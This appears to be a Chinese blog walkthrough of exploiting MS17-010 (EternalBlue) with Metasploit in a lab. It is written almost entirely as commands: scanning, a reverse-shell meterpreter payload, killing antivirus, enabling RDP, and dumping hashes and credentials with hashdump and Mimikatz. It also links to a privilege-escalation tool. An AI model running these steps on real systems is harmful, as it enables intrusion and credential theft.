23.通過MS17_010來學習msf對滲透的利用


 

Metersploit 集成了滲透階段的全部利用,從漏洞探測,到漏洞利用,最后到后滲透階段。本次博客主要拋磚引玉,通過對MS17_010漏洞的復現,來學習Metasploit。

漏洞環境:

      靶機:windows 7 (192.168.0.135)

      攻擊機:kali 2018 (192.168.0.133)

開始之前先來熟悉 Metaspolit 基本術語:

Auxiliaries(輔助模塊),Exploit(漏洞利用模塊),Payload(攻擊載荷模塊),Post(后期滲透模塊),Encoders(編碼工具模塊)

1.加載smb掃描模塊

msf > search auxiliary/scanner/smb

發現可利用的smb_ms17_010模塊

2.加載漏洞掃描模塊對ip段進行漏洞掃描:

msf > use auxiliary/scanner/smb/smb_ms17_010

msf > set rhosts 192.168.0.100-150

msf > set threads 10

msf > run

發現 192.168.0.135 這台主機可能存在MS17_010漏洞

3.利用nmap對漏洞主機進行探測:

msf > nmap -T4 -A 192.168.0.135

發現敏感端口139,445開啟

4.搜索MS17_010可利用漏洞模塊

msf > search ms17_010

(沒有的話 git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git)

5.加載漏洞利用模塊,設置參數

msf > use exploit/windows/smb/ms17_010_eternalblue

msf > set lhost 192.168.0.133

msf > set rhost 192.168.0.135

msf > set payload windows/x64/meterpreter/reverse_tcp

msf > exploit

可以看到漏洞利用成功,現在是 system 最高權限

6.信息查看

進程遷移:

因為shell都是不穩定的,所以需要找到一個可靠的進程,遷移過去:

migrate 要遷移的進城號

查看系統信息:

meterpreter > sysinfo

查看是否為虛擬機:

meterpreter > run post/windows/gather/checkvm

查看目標機運行時間:

meterpreter > idletime

查看完整網絡設置:
meterpreter > route

關閉殺毒軟件:

meterpreter > run post/windows/manage/killav

啟動目標機的遠程桌面協議,開啟3389端口:

meterpreter > run post/windows/manage/enable_rdp

可以看到已經成功啟動了遠程桌面。

列舉當前登陸過的用戶:

meterpreter > run post/windows/gather/enum_logged_on_users

可以看到有 SecEvery,Administrator兩個用戶。

列舉安裝在目標機上的應用程序:

meterpreter > run post/windows/gather/enum_applications

將當前Meterpreter終端隱藏在后台:

meterpreter > background

需要重新調用終端:

meterpreter > sessions -i 1

 

很多用戶習慣將計算機設置為自動登陸,下面這個命令可以抓取自動登陸的用戶名和密碼:

meterpreter > run windows/gather/credentials/windows_autologin

下載c盤下1.txt文件到/home目錄下:

meterpreter > download c:\txt /home

上傳/home目錄下1.txt文件到c盤下:

meterpreter > upload /home/1.txt c:\

密碼抓取:

1.使用Hashdump抓取密碼

Hashdump Meterpreter腳本可以從目標機中提取Hash值,破解Hash值即可獲得登陸密碼。計算機中的每個賬號(如果是域服務器,則為域內的每個賬號)的用戶名和密碼都存儲在sam文件中,當計算機運行時,該文件對所有賬號進行鎖定,要想訪問就必須有“系統級”賬號。所以要使用改名了就必須進行權限提升。

在Meterpreter Shel提示符下輸入hashdump命令,將導出目標機sam數據庫中的Hash:

2.使用Mimikatz抓取密碼

加載mimikatz模塊:

meterpreter > load mimikatz

看了大概使用方法后,既可以使用Metasploit內建的命令,也可以使用Mimikatz自帶的命令從目標機器上導出Hash和明文證書。

抓取系統Hash:

meterpreter > msv

md5解密:

抓取系統票據:

meterpreter > kerberos

獲取系統賬戶信息:

 

----------------------------------------------------------------------------------

emmmm....為了給這篇文章增加一點營養,這里另附使用MS16_032對 windows 2003 進行溢出提權:

另附ms16_032提權小工具:

https://pan.baidu.com/s/141N6rXVO7mGvuXfp5UzzBA

提取碼:yavh      解壓碼: 96sec.org

參考鏈接:

https://xz.aliyun.com/t/2536

https://www.cnblogs.com/lsgxeva/p/8450277.html

https://www.cnblogs.com/backlion/p/6804863.html

http://www.96sec.org/blog/post/243.html


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM